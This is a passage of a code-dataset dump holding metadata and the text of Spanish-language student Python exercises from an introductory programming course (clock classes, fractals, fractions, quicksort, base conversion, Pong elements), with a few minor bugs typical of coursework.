width=ancho)\r\nlabelLargoCola2.grid(row=3, column=2)\r\nnombreCola2 = Entry(fila4, width=ancho)\r\nnombreCola2.bind(\"<Return>\", (lambda evento: agregarCliente(cola2, tiempo2, nombreCola2)))\r\nnombreCola2.grid(row=3, column=3)\r\n\r\nventana.mainloop()"
},
{
"alpha_fraction": 0.5482680201530457,
"alphanum_fraction": 0.5831913948059082,
"avg_line_length": 27.87704849243164,
"blob_id": "8c6a19aeea8354cc25e5f6f3a62925d5c3da3bba",
"content_id": "f357e93e17df878fe96efdb4267662e3673a85cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3522,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 122,
"path": "/Ejercicios/Semana 13/Reloj.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "#manejo de un contador modulo limite\n#__valor: int\n#__limite: int\nclass Contador:\n #__init__: int int -> Contador\n # contador con valor en rango [0,limite[\n #ej: C=Contador(0,10)\n def __init__(self,valor=0,limite=100):\n assert type(limite)==int and limite>0\n self.__limite=limite\n assert type(valor)==int and \\\n 0<=valor and valor<limite \n self.__valor=valor\n \n #getValor: -> int\n # devuelve valor de objeto self\n # ej: C.getValor() -> 50\n def getValor(self):\n return self.__valor\n \n #setValor: int -> \n # reemplaza valor de objeto self\n # si es >= limite, no hacer nada\n # ej: C.setValor(10) -> C.getValor()==10\n def setValor(self,valor):\n assert type(valor)==int and valor>=0\n if valor<self.__limite:\n self.__valor=valor\n \n #incrementar: -> \n #suma 1 a valor de self (modulo limite)\n #ej: C.incrementar() -> C.getValor()==1\n def incrementar(self):\n self.__valor=(self.__valor+1) % self.__limite\n\n #__str__: -> str\n #string con valor de self \n #(si menor que 10 anteponer 0)\n #ej: str(C) -> \"08\"\n def __str__(self):\n n=self.__valor\n if n<10:\n return \"0\"+str(n)\n else:\n return str(n)\n\n#clase para test de clase Contador\nclass TestContador:\n def __init__(self):\n self.C = Contador(0,limite=3)\n def test(self):\n assert self.C.getValor()==0\n self.C.incrementar()\n assert self.C.getValor()==1\n self.C.incrementar()\n assert self.C.getValor()==2\n self.C.incrementar()\n assert self.C.getValor()==0\n self.C.incrementar()\n assert str(self.C)==\"01\"\n self.C.setValor(2)\n assert self.C.getValor()==2\ntest=TestContador()\ntest.test()\n\n\n#__horas: Contador (modulo 24)\n#__minutos: Contador (modulo 60)\n#__segundos: Contador (modulo 60)\nclass Reloj:\n #__init__: int, int -> Reloj\n #crear reloj a la hora y minutos indicados\n #ej: R=Reloj(23,58)\n def __init__(self,horas=0,minutos=0,segundos=0):\n assert type(horas)==int and type(minutos)==int and type(segundos)==int\n self.__horas=Contador(horas,24)\n self.__minutos=Contador(minutos,60)\n self.__segundos=Contador(segundos,60)\n\n #tic: ->\n #avanzar el reloj en un minuto\n #ej: R.tic() -> str(R)==\"23:59\"\n def tic(self):\n self.__segundos.incrementar()\n if self.__segundos.getValor()==0:\n self.__minutos.incrementar()\n if self.__minutos.getValor()==0:\n self.__horas.incrementar()\n\n #setReloj: int int -> None\n #fijar la hora del reloj en horas y minutos\n #ej: R.setReloj(23,58) -> str(R)==\"23:58\"\n def setReloj(self,horas=0,minutos=0,segundos=0):\n assert type(horas)==int and type(minutos)==int and type(segundos)==int\n self.__horas.setValor(horas)\n self.__minutos.setValor(minutos)\n self.__segundos.setValor(segundos)\n\n #__str__: None -> str\n #string con valor de self\n #ej: str(R) -> \"23:58\"\n def __str__(self):\n return str(self.__horas) + \":\" + \\\n str(self.__minutos) + \":\" + \\\n str(self.__segundos)\n\n# clase para test de Reloj\nclass TestReloj:\n def __init__(self):\n self.R = Reloj(23,58,58)\n def test(self):\n assert str(self.R)==\"23:58:58\"\n self.R.tic()\n self.R.tic()\n assert str(self.R)==\"23:59:00\"\n for _ in range(0,60) :\n self.R.tic()\n assert str(self.R)==\"00:00:00\"\n self.R.setReloj(15,35,10)\n assert str(self.R)==\"15:35:10\"\n self.R.tic()\n assert str(self.R)==\"15:35:11\""
},
{
"alpha_fraction": 0.6343490481376648,
"alphanum_fraction": 0.6454293727874756,
"avg_line_length": 18.052631378173828,
"blob_id": "acd81f915ae5ea26da8f15ecc9de69d3923ae96a",
"content_id": "7d47e5d4d3ae092a60fd173eda49fff99ce7b61a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 361,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 19,
"path": "/Ejercicios/Semana 09/copiarArchivos.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# Abrir archivos.\nA = open(raw_input(\"Archivo input? \"), \"r\")\nB = open(raw_input(\"Archivo output? \"), \"w\")\ngrabadas = 0\nleidas = 0\n\nbuscar = raw_input(\"Copiar valores con string: \")\n\nfor linea in A :\n if buscar in linea: \n B.write(linea)\n grabadas += 1\n leidas += 1\n\nprint \"Lineas leidas\", leidas\nprint \"Lineas grabadas\", grabadas\n \nA.close()\nB.close()"
},
{
"alpha_fraction": 0.5895652174949646,
"alphanum_fraction": 0.6197101473808289,
"avg_line_length": 32.5,
"blob_id": "3a8c4c819fd966990bb72b66f11c7f2d75643fce",
"content_id": "55ad178c7c3484947b29717b0de3dd8c40f1d5c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1725,
"license_type": "no_license",
"max_line_length": 283,
"num_lines": 50,
"path": "/Ejercicios/Semana 03/fractalCuadrado.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "import turtle\r\n\r\n# fractal: int, int -> none\r\n# dibuja un fractal de Koch en version cuadrada haciendo uso de la funcion lado, definida posteriormente, n corresponde al orden del fractal y L al largo de cada segmento principal, si se omite este valor, el lado sera 200 pixeles por defecto.\r\n# fractal(1, 100) -> \"se dibuja un cuadrado en la ventana turtle\"\r\ndef fractal(n,L=200) :\r\n assert type(n) == int and n>=1\r\n assert type(L) == int and L>0\r\n lado(n,L)\r\n turtle.right(90)\r\n lado(n,L)\r\n turtle.right(90)\r\n lado(n,L)\r\n turtle.right(90)\r\n lado(n,L)\r\n\r\n# lado: int, int, int -> none\r\n# dibuja cada lado del fractal de Koch version cuadrada, n corresponde al orden del fractal, L al largo de cada lado (en pixeles), si no se define, toma por defecto el valor de 200px, Lmin corresponde al largo minimo de cada lado, por defecto es 6px. debe de invocarse por fractal().\r\n# lado(1, 100, 6) -> \"se dibuja una linea\"\r\ndef lado(n,L=200,Lmin=6) :\r\n assert type(n) == int and n>=1\r\n assert type(L) == int and L>0\r\n if n==1 or L<Lmin :\r\n turtle.forward(L)\r\n else :\r\n lado(n-1,L/3)\r\n turtle.left(90)\r\n lado(n-1,L/3)\r\n turtle.right(90)\r\n lado(n-1,L/3)\r\n turtle.right(90)\r\n lado(n-1,L/3)\r\n turtle.left(90)\r\n lado(n-1,L/3)\r\n\r\n#-------------------------- programa interactivo --------------------------#\r\n\r\n# inicializacion de turtle\r\nturtle.getscreen()\r\nturtle.resetscreen()\r\n\r\n# pedir valores de orden y de largo al usuario\r\nn = input(\"nivel: \")\r\nL = input(\"largo: \")\r\n\r\n# inicia el trazado\r\nfractal(n)\r\n\r\n# marca el final del trazado y mantiene la ventana del turtle abierta hasta que se cierre por el usuario\r\nturtle.done()\r\n"
},
{
"alpha_fraction": 0.6045050024986267,
"alphanum_fraction": 0.6275537014007568,
"avg_line_length": 42.3863639831543,
"blob_id": "d747255edb66ac96d2e1d51bfe70c2739f096556",
"content_id": "e8ffb2e621ed062aa8ba1b1b98d4f00801d4394d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1909,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 44,
"path": "/Ejercicios/Semana 08/agenda.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "#agenda: list(list)\nagenda=[[\"a\", 2],[\"c\", 1],[\"d\", 4]]\n\n# buscar: str, list -> int\n# Entrega el telefono del nombre (argumento) en una agenda (argumento), si no existe, entrega None.\n# ej: buscar(\"a\", agenda) -> 2\n# ej: buscar(\"b\", agenda) -> None\ndef buscar(nombre, agenda) :\n assert type(nombre) == str and type(agenda) == list\n for entrada in agenda :\n if nombre == entrada[0] : return entrada[1]\n return None\nassert buscar(\"a\", agenda) == 2\nassert buscar(\"b\", agenda) == None\n\n# agregar: str, int, list -> list\n# Agrega una entrada con nombre y telefono a una agenda, entrega esta nueva agenda ordenada.\n# ej: agregar(\"b\", 23, agenda) -> [['a', 2], ['b', 23], ['c', 1], ['d', 4]]\ndef agregar(nombre, telefono, agenda) :\n assert type(nombre) == str and type(telefono) == int and type(agenda) == list\n agenda.append([nombre, telefono])\n agenda.sort()\n return agenda\nassert agregar(\"b\", 23, agenda) == [['a', 2], ['b', 23], ['c', 1], ['d', 4]]\n\n# borrar: str, list -> list\n# Borra una entrada (usando solo el nombre) de una agenda y entrega esta nueva agenda sin la entrada especificada (si aplica).\n# ej: borrar(\"a\", agenda) -> [[\"b\", 23], [\"c\", 1],[\"d\", 4]]\ndef borrar(nombre, agenda) :\n assert type(nombre) == str and type(agenda) == list\n for entrada in agenda :\n if nombre == entrada[0] : agenda.remove(entrada)\n return agenda\nassert borrar(\"a\", agenda) == [[\"b\", 23], [\"c\", 1],[\"d\", 4]]\n\n# cambiar: str, int, list -> list\n# Cambia el telefono de la entrada correspondiente al nombre en una agenda. Entrega la agenda actualizada si aplica.\n# ej: cambiar(\"b\", 42, agenda) -> [[\"b\", 42], [\"c\", 1],[\"d\", 4]]\ndef cambiar(nombre, telefono, agenda) :\n assert type(nombre) == str and type(telefono) == int and type(agenda) == list\n for entrada in agenda :\n if nombre == entrada[0] : entrada[1] = telefono\n return agenda\nassert cambiar(\"b\", 42, agenda) == [['b', 42], ['c', 1], ['d', 4]]\n"
},
{
"alpha_fraction": 0.6077401041984558,
"alphanum_fraction": 0.6187291145324707,
"avg_line_length": 26.552631378173828,
"blob_id": "3882573f75199c96da82e700c636d53bdfaf1e6e",
"content_id": "fbb7ec75a43de802d27c399517ae339ced7cf7d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2093,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 76,
"path": "/Ejercicios/Semana 11/Fraccion.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "#numerador : int\n#denominador : int\nclass Fraccion:\n def __init__(self,x=0,y=1):\n if type(x)==str:\n i=x.find(\"/\") \n self.numerador=int(x[0:i]) \n self.denominador=int(x[i+1:])\n\n elif isinstance(x,Fraccion):\n self.numerador=x.numerador\n self.denominador=x.denominador\n\n else:\n assert type(x)==int and type(y)==int\n self.numerador=x\n self.denominador=y\n assert self.denominador!=0\n\n def __add__(self,x):\n assert isinstance(x,Fraccion) \n num=self.numerador * x.denominador + \\\n self.denominador * x.numerador\n den=self.denominador * x.denominador\n return Fraccion(num,den)\n \n def __sub__(self,x):\n assert isinstance(x,Fraccion) \n num=self.numerador * x.denominador - \\\n self.denominador * x.numerador\n den=self.denominador * x.denominador\n return Fraccion(num,den)\n \n def __mul__(self,x):\n assert isinstance(x,Fraccion) \n num=self.numerador * x.numerador\n den=self.denominador * x.denominador\n return Fraccion(num,den)\n \n def __div__(self,x):\n assert isinstance(x,Fraccion) \n num=self.numerador * x.denominador\n den=self.denominador * x.numerador\n return Fraccion(num,den)\n\n def __str__(self):\n return str(self.numerador) + \"/\" + str(self.denominador)\n\n def __gt__(self,x):\n return self.numerador * x.denominador \\\n > self.denominador * x.numerador\n\n def __eq__(self,x):\n return self.numerador * x.denominador \\\n == self.denominador * x.numerador\n\n# -------------------- Programa Interactivo -------------------- #\nprint \"Calculadora de Fracciones\"\nfrac1 = Fraccion(raw_input(\"Fraccion 1(n/n)? \"))\nfrac2 = Fraccion(raw_input(\"Fraccion 2(n/n)? \"))\nop = raw_input(\"Operacion (+ - * /)? \")\n\ndef resultado(frac1, frac2, op) :\n assert isinstance(frac1, Fraccion) and isinstance(frac2, Fraccion)\n if op == \"+\" :\n return frac1 + frac2\n elif op == \"-\" :\n return frac1 - frac2\n elif op == \"*\" :\n return frac1 * frac2\n elif op == \"/\" :\n return frac1 / frac2\n else :\n print \"Invalido\"\n\nprint \"Resultado =\", resultado(frac1, frac2, op)"
},
{
"alpha_fraction": 0.7237237095832825,
"alphanum_fraction": 0.7307307124137878,
"avg_line_length": 36.01852035522461,
"blob_id": "58267d8fac9302f51cccfd9dc70fff90165e544f",
"content_id": "acc579c7fe695f171c7d46f784d14ac75eafb151",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1998,
"license_type": "no_license",
"max_line_length": 191,
"num_lines": 54,
"path": "/Tareas/Tarea 03/parte2.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "from conjunto import *\n\n# Abrir listas de alumnos.\nA = open(\"A.txt\", \"r\")\nB = open(\"B.txt\", \"r\")\nC = open(\"C.txt\", \"r\")\n\n# Cargar listas de alumnos en un list para usar modulo conjunto.\n\n# generarList : file -> list(str)\n# Entrega un list a partir de un archivo.\n# ej: generarList(A) -> [linea1, linea2, linea3...]\ndef generarList(archivo) :\n resultado = []\n for linea in archivo :\n resultado += [linea[:-1]] # Quita el \\n (newline) del string de cada linea. Los archivos tienen que terminar por una linea en blanco, caso contrario se come el ultimo caracter del string.\n return resultado\n\nlistA = generarList(A)\nlistB = generarList(B)\nlistC = generarList(C)\n\n# Realizar operaciones conjuntos.\ninter1 = inter(listA, listB) # Alumnos en cursos A y B.\ninter2 = inter(listB, listC) # Alumnos en cursos B y C.\ninter3 = inter(listA, listC) # Alumnos en cursos A y C.\nunionAlumnos = union(union(listA, listB), listC) # Lista de todos los alumnos.\n\n# Alumnos en los 3 cursos:\nlistTresCursos = inter(inter1, listC) # Interseccion entre alumnos en A, B y C.\n\n#Alumnos en los 2 cursos:\nlistDosCursos = resta(union(union(inter1, inter2), inter3), listTresCursos) # Union de las intersecciones AB, BC y AC y restando la interseccion ABC.\n\n#Alumnos en un solo curso:\nlistUnCurso = resta(resta(unionAlumnos, listDosCursos), listTresCursos) # Restamos la lista de todos los alumnos con los que se encuentran en dos cursos y los que estan en 3 tambien.\n\n# Entrega de datos\n\n# imprimir : list(str) -> None\n# Imprime los datos del list (cardinal y items como string).\n# ej: imprimir(listUnCurso)\ndef imprimir(lista) :\n assert esConjunto(lista)\n print \" - Numero de alumnos:\", cardinal(lista)\n print \" - Nombres de los alumnos:\", aString(lista)\n return\n\nprint \"Alumnos que esten cursando los tres cursos:\"\nimprimir(listTresCursos)\nprint \"Alumnos que esten cursando solo dos de los tres cursos:\"\nimprimir(listDosCursos)\nprint \"Alumnos que esten cursando en solo uno de los tres cursos:\"\nimprimir(listUnCurso)"
},
{
"alpha_fraction": 0.5969230532646179,
"alphanum_fraction": 0.620512843132019,
"avg_line_length": 37.235294342041016,
"blob_id": "2f852598ec78c7605ae95629d82ba8b8e084067d",
"content_id": "c9e1ec6843a8daad2d4d3d4f319ab79ea0e36a6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1950,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 51,
"path": "/Ejercicios/Semana 04/coprimos.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# mayorComunDivisor : int, int -> int\n# calcula el mayor comun divisor entre dos enteros positivos\n# mayorComunDivisor(12, 25) -> 1\ndef mayorComunDivisor(a, b) :\n assert type(a) == int and a>=0\n assert type(b) == int and b>=0\n # caso base, llegamos al resultado\n if b == 0 :\n return a\n if a == b :\n return a\n # necesitamos que a sea mayor que b para continuar\n elif a>b :\n r = a%b # resto de la division a por b\n # si el resto es nulo, llegamos al mayor comun divisor\n if r == 0 :\n return b\n # b toma el valor de a y r toma el valor de b para continuar\n else :\n return mayorComunDivisor(b, r)\n\n print mayorComunDivisor(12, 25)\n # si b es mayor que a, se llama la misma funcion pero con los valores invertidos\n else :\n return mayorComunDivisor(b, a)\nassert mayorComunDivisor(134, 28) == 2\nassert mayorComunDivisor(12, 25) == 1\n\n# coprimosEnRango : int, int -> None\n# escribe coprimos en el rango de enteros entre x e y\n# ej: coprimosEnRango(2, 5) -> 2,3 2,5, 3,4 3,5 4,5\ndef coprimosEnRango(x, y) :\n assert type(x) == int and x>=0\n assert type(y) == int and y>=x # rango tiene que ser valido\n # funcion auxiliar para imprimir los coprimos\n def iterandoEnRango(x, y, xi=x, yi=y) :\n # si x llega al valor y que fue pasado en coprimosEnRango(), termina el ciclo\n if x>yi :\n return \"Terminado.\"\n # si y pasado en iterandoEnRango() llega a ser mayor al y en iterandoEnRango(), se vuelve a iterar esta funcion con un valor de x+1\n if y>yi :\n return iterandoEnRango(xi+1, xi+1, xi+1, yi)\n # si son coprimos, los imprimimos\n if mayorComunDivisor(x, y) == 1 :\n print x, y\n # volvemos a iterar con y+1\n return iterandoEnRango(x, y+1, xi, yi)\n # ejecutamos la funcion auxiliar\n return iterandoEnRango(x, x, x, y)\n\n#print coprimosEnRango(2, 5)\n"
},
{
"alpha_fraction": 0.6540983319282532,
"alphanum_fraction": 0.6639344096183777,
"avg_line_length": 24.41666603088379,
"blob_id": "49c533c0c2c356e06c00b2681eb5ca719935cea7",
"content_id": "75431bf1480448b2b0d6b337ad4f1dda641f0e9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1220,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 48,
"path": "/Tareas/Tarea 02/lista.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# modulo: lista.py\nimport estructura\n\n#lista: valor(any) siguiente(lista)\nestructura.crear(\"lista\",\"valor siguiente\")\nlistaVacia=None #lista sin valores\n\n#cabeza: lista -> any\n#primer valor de una lista\n#ej: cabeza(lista(\"a\",lista(\"b\",None)))->\"a\"\ndef cabeza(L):\n assert type(L)==lista\n return L.valor\nassert cabeza(lista(\"a\",lista(\"b\",None)))==\"a\"\n\n#cola: lista -> lista\n#devuelve lista sin primer valor\n#ej: cola(lista(\"a\",lista(\"b\",None)))->lista(\"b\",None)\n#ej: cola(lista(\"a\",None))->None\ndef cola(L):\n assert type(L)==lista\n return L.siguiente\nassert cola(lista(\"a\",lista(\"b\",None))) == lista(\"b\",None)\nassert cola(lista(\"a\",None))==None\n\n#esLista: lista -> bool\n#True si L es una lista\n#ej: esLista(lista(1,None)) -> True\n#ej: esLista(0) -> False\ndef esLista(L) :\n return type(L) == lista or L == None\nassert esLista(lista(1, None))\nassert not esLista(0)\n\n#enLista: any lista -> bool\n#True si x esta en L\n#ej: si L=lista(4,lista(5,None)) entonces\n# enlista(5,L)->True, enLista(3,L)->False\ndef enLista(x,L):\n assert esLista(L)\n if L==None: return False\n if cabeza(L)==x: \n return True\n else: \n return enLista(x,cola(L))\nL=lista(4,lista(5,None))\nassert enLista(5,L)\nassert not enLista(3,L)\n"
},
{
"alpha_fraction": 0.5650500655174255,
"alphanum_fraction": 0.6027713418006897,
"avg_line_length": 22.636363983154297,
"blob_id": "c1305c812d28eaeded34f7850bd3aa6e095139af",
"content_id": "a86c100bbfd049b0b2cb2c7cf13c707779aea49c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1299,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 55,
"path": "/Ejercicios/Semana 10/quicksort_bentley.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "from random import randint\n\n# generarListaRandom : int -> list(int)\n# Entrega una lista de tamano n de enteros aleatorios entre 1 y 100.\n# ej: generarListaRandom(2) -> [34, 61]\ndef generarListaRandom(n) :\n assert type(n) == int and n > 0\n lista = []\n for i in range(n) :\n lista += [randint(1, 100)]\n return lista\n\n# ordenada : list(any) -> bool\n# Entrega True si la lista esta ordenada.\n# ej: ordenada([1, 2, 3, 4, 5]) -> True\n# ej: ordenada([1, 3, 6, 2, 1]) -> False\ndef ordenada(lista) :\n assert type(lista) == list\n for i in range(1, len(lista)-1) :\n if lista[i] > lista[i+1] : \n return False\n return True\nassert ordenada([1, 2, 3, 4, 5])\nassert not ordenada([1, 3, 6, 2, 1])\n\n# Quicksort de Bentley\ndef quicksort(L) :\n def particionar(L, ip, iu) :\n pivote = L[iu]\n i = ip - 1\n for j in range(ip, iu) :\n if L[j] <= pivote :\n i += 1\n L[i], L[j] = L[j], L[i]\n L[i+1], L[iu] = L[iu], L[i+1]\n return i+1\n \n def qsort(L, ip, iu) :\n if ip >= iu : return\n i = particionar(L, ip, iu)\n qsort(L, ip, i-1)\n qsort(L, i+1, iu)\n assert type(L) == list\n qsort(L, 0, len(L)-1)\n\n# Testing\nlistaRandom = generarListaRandom(100)\n\nprint listaRandom\nprint ordenada(listaRandom)\n\nquicksort(listaRandom)\n\nprint listaRandom\nprint ordenada(listaRandom)"
},
{
"alpha_fraction": 0.5009940266609192,
"alphanum_fraction": 0.5546719431877136,
"avg_line_length": 27.58823585510254,
"blob_id": "dc8cf05f6812d1a0bb9c0cfc066c9c0b046e8756",
"content_id": "f49acef35e607408069894fb2c23f02b525bdc3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 503,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 17,
"path": "/Ejercicios/Semana 01/triangulo.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# perimetro: num, num, num -> num\r\n# calcular perimetro de un triangulo.\r\n# ej: perimetro(4, 5, 6) -> 15\r\ndef perimetro(a, b, c) :\r\n return a+b+c\r\nassert perimetro(4,5,6) == 15\r\n\r\n# area: num, num, num -> float\r\n# calcular el area de un triangulo siempre y cuando este sea valido.\r\n# ej: area(4, 5, 6) -> 9.92\r\ndef area(a, b, c) :\r\n s = perimetro(a, b, c)/2.0\r\n if a+b>c and b+c>a and a+c>c:\r\n return (s*(s-a)*(s-b)*(s-c))**0.5\r\n else:\r\n return 0\r\n#assert area(4,5,6) == 9.92\r\n"
},
{
"alpha_fraction": 0.6141916513442993,
"alphanum_fraction": 0.6575313210487366,
"avg_line_length": 48.6129035949707,
"blob_id": "0cee5eea2059c4fe4a114d8401fda0cf9e2a4fad",
"content_id": "767176e33f35f06a7ecf0a5e7a13a16bf8714402",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4707,
"license_type": "no_license",
"max_line_length": 191,
"num_lines": 93,
"path": "/Tareas/Tarea 01/sistemasPosicionales.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# aislarUnidad : int -> int\r\n# Recibe un entero positivo y devuelve su unidad (ultimo digito). (FUNCION AUXILIAR)\r\n# aislarUnidad(4) -> 4\r\n# aislarUnidad(123) -> 3\r\ndef aislarUnidad(entero) :\r\n assert type(entero) == int and entero >= 0\r\n if entero < 10 :\r\n return entero\r\n else :\r\n paraAislar = entero / 10 # separamos todos los digitos ademas del ultimo\r\n return entero - paraAislar*10 # aislamos el ultimo digito\r\nassert aislarUnidad(4) == 4\r\nassert aislarUnidad(123) == 3\r\n\r\n# correcto: int, int -> bool\r\n# Recibe dos enteros positivos: un numero y una base, se asegura que el numero entero positivo que se entrega sea valido para la base que se entrega. La base puede ser un entero entre 2 y 10.\r\n# correcto(45, 2) -> False\r\n# correcto(45, 10) -> True\r\n# correcto(45, 6) -> True\r\ndef correcto(numero, base) :\r\n # precondiciones: se asegura que el numero sea entero positivo y que la base sea un entero entre 2 y 10.\r\n assert type(numero) == int and numero >= 0\r\n assert type(base) == int and 2 <= base and base <= 10\r\n # si la base es 10, no tiene sentido continuar\r\n if base == 10 :\r\n return True\r\n if numero > 9 :\r\n unidad = aislarUnidad(numero)\r\n # se prueba si es un numero inferior a la base\r\n if unidad / base < 1 :\r\n return correcto(numero/10, base) # se vuelve a correr la funcion sin el ultimo digito\r\n else :\r\n return False\r\n else :\r\n # se prueba si es un numero inferior a la base\r\n if numero / base < 1:\r\n return True\r\n else :\r\n return False\r\nassert not correcto(45, 2)\r\nassert correcto(45, 10)\r\nassert correcto(45, 6)\r\n\r\n# base10: int, int -> int\r\n# Recibe dos argumentos: un entero positivo y una base (entero del 2 al 10), convierte un numero de base dada a su equivalente en decimal (base 10).\r\n# base10(100110101, 2) -> 309\r\n# base10(2375, 8) -> 1277\r\ndef base10(numero, base) :\r\n # precondiciones: se asegura que el numero sea entero positivo, que la base sea un entero entre 2 y 10 y que el numero corresponda efectivamente a la base especificada.\r\n assert type(numero) == int and numero >= 0\r\n assert type(base) == int and 2 <= base and base <= 10\r\n assert correcto(numero, base)\r\n # si la base es 10, no tiene sentido continuar\r\n if base == 10 :\r\n return numero\r\n # se define una funcion interna para guardar el nivel y la suma.\r\n def funcionSuma(numero, base, nivel=0, suma=0) :\r\n if numero > 9 :\r\n unidad = aislarUnidad(numero) # obtenemos solo la unidad\r\n suma += unidad*base**nivel # sumamos lo que teniamos antes como suma y la unidad multiplicada por la base elevada al numero de iteracion.\r\n nivel += 1 # le agregamos uno al numero de iteracion.\r\n return funcionSuma(numero/10, base, nivel, suma) # volvemos a realizar base10() con el numero dividido por 10.\r\n else :\r\n suma += numero*base**nivel\r\n return suma\r\n return funcionSuma(numero, base) # llamamos a la funcion interna\r\nassert base10(100110101, 2) == 309\r\nassert base10(2375, 8) == 1277\r\n\r\n# otraBase: int, int -> int\r\n# Recibe dos argumentos: un entero positivo y una base (entero del 2 al 10), convierte un decimal (base 10) a su equivalente en otra base dada.\r\n# otraBase(45, 2) -> 101101\r\n# otraBase(101101, 8) -> 305355\r\ndef otraBase(decimal, base) :\r\n # precondiciones: se asegura que el decimal sea entero positivo, que la base sea un entero entre 2 y 10 y finalmente que el decimal sea efectivamente un decimal.\r\n assert type(decimal) == int and decimal >= 0\r\n assert type(base) == int and 2 <= base and base <= 10\r\n assert correcto(decimal, 10)\r\n # si la base es 10, no tiene sentido continuar\r\n if base == 10 :\r\n return decimal\r\n # se define una funcion interna para guardar el valor del resultado entre iteraciones\r\n def funcionResultado(decimal, base, resultado=\"\") :\r\n if decimal > 0 :\r\n tempDecimal = decimal / base # divide el decimal por la base para obtener el siguiente decimal que se asignara a la funcion\r\n tempResultado = str(decimal % base) + resultado # concatena el resultado que se obtiene en esta iteracion y el resultado previo en un string\r\n return funcionResultado(tempDecimal, base, tempResultado)\r\n # el final de esta funcion recursiva se marca cuando decimal es 0\r\n else :\r\n return int(resultado) #entrega el resultado convertido en int (antes era str)\r\n return funcionResultado(decimal, base, resultado=\"\") # llamamos a la funcion interna\r\nassert otraBase(45, 2) == 101101\r\nassert otraBase(101101, 8) == 305355\r\n"
},
{
"alpha_fraction": 0.43986254930496216,
"alphanum_fraction": 0.4501718282699585,
"avg_line_length": 24.110000610351562,
"blob_id": "321a6ae35cdde492dde17a18acce7964ad5160ed",
"content_id": "25c0e5988dd64bd9916cabdd7d95f9e2e11c277a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2619,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 100,
"path": "/Pong/elementos.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "class Barra() :\r\n def __init__(self, x, y, ancho, alto) :\r\n self.__x = x\r\n self.__y = y\r\n self.__ancho = ancho\r\n self.__alto = alto\r\n \r\n def x(self) :\r\n return self.__x\r\n \r\n def y(self) :\r\n return self.__y\r\n \r\n def ancho(self) :\r\n return self.__ancho\r\n \r\n def alto(self) :\r\n return self.__alto\r\n \r\n def x2(self) :\r\n return self.__x + self.__ancho\r\n\r\n def y2(self) :\r\n return self.__y + self.__alto\r\n\r\n def anchoBarra(self) :\r\n return self.__x + self.__ancho\r\n \r\n def altoBarra(self) :\r\n return self.__y + self.__alto\r\n \r\n def actualizarPos(self, dir) :\r\n if dir == 1 or dir == -1 :\r\n self.__x += 20*dir\r\n else : return\r\n\r\nclass Bola(Barra) :\r\n def __init__(self, x, y, cv, bar):\r\n self.__x = x\r\n self.__y = y\r\n self.__velx = 3\r\n self.__vely = 4\r\n self.__rad = 20\r\n self.__ancho = cv.winfo_width()\r\n self.__alto = cv.winfo_height()\r\n self.__muerto = False\r\n self.__bar = bar\r\n self.__puntos = 0\r\n\r\n def x(self):\r\n return self.__x\r\n \r\n def y(self):\r\n return self.__y\r\n \r\n def diam(self):\r\n return 2*self.__rad\r\n\r\n def x2(self):\r\n return self.__x + self.diam()\r\n \r\n def y2(self):\r\n return self.__y + self.diam()\r\n\r\n def velx(self):\r\n return self.__velx\r\n\r\n def vely(self):\r\n return self.__vely\r\n\r\n def rad(self):\r\n return self.__rad\r\n \r\n def muerto(self):\r\n return self.__muerto\r\n\r\n def puntos(self):\r\n return self.__puntos\r\n\r\n # Parece que hay un offset raro en el canvas que hace que el 6 sea el numero\r\n # minimo para hacer que la bola rebote.\r\n def actualizarPos(self):\r\n self.__x += self.__velx\r\n self.__y += self.__vely\r\n\r\n if self.x2() > self.__ancho :\r\n self.__velx = -self.__velx\r\n elif self.__x < 6 :\r\n self.__velx = -self.__velx\r\n self.__velx = (self.__velx/abs(self.__velx))*abs(self.__velx)+1\r\n \r\n if self.__y < 6 :\r\n self.__vely = -self.__vely\r\n self.__vely = (self.__vely/abs(self.__vely))*abs(self.__vely)+1\r\n 